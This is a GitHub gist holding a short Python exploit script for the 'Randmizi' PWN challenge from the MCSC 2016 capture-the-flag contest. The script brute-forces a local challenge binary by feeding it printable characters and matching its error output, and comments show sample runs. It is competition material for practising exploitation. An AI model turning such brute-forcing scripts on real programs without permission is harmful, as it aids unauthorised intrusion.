Created
April 12, 2017 11:50
-
-
Save 0xPwny/8d95b60e00222abc3692c7ab0e164ffc to your computer and use it in GitHub Desktop.
Randmizi - MCSC 2016 CTF - PWN - 200 pts
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| #MCSC CTF 2016: Randmizi | |
| #Category : PWN | |
| #Points : 200 | |
| #Exploit : Abdeljalil Nouiri | |
| ############################## | |
| #pwny@local:~/mcsc16/pwn/Randmizi$ python exploit.py s | |
| #[+] i Found it : F | |
| #pwny@local:~/mcsc16/pwn/Randmizi$ python exploit.py h | |
| #[+] i Found it : [ | |
| ############################## | |
| from subprocess import * | |
| import string | |
| import sys | |
| keywords = string.printable | |
| file = "./pwn1" | |
| magic = "" | |
| for i in keywords: | |
| p = Popen([file],stdin=PIPE,stdout=PIPE,stderr=PIPE) | |
| p.stdin.write(i) | |
| rez = p.stderr.readline() | |
| if ":" in rez: | |
| if sys.argv[1] in rez.split(":")[2]: | |
| print "[+] i Found it : %s "%i |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment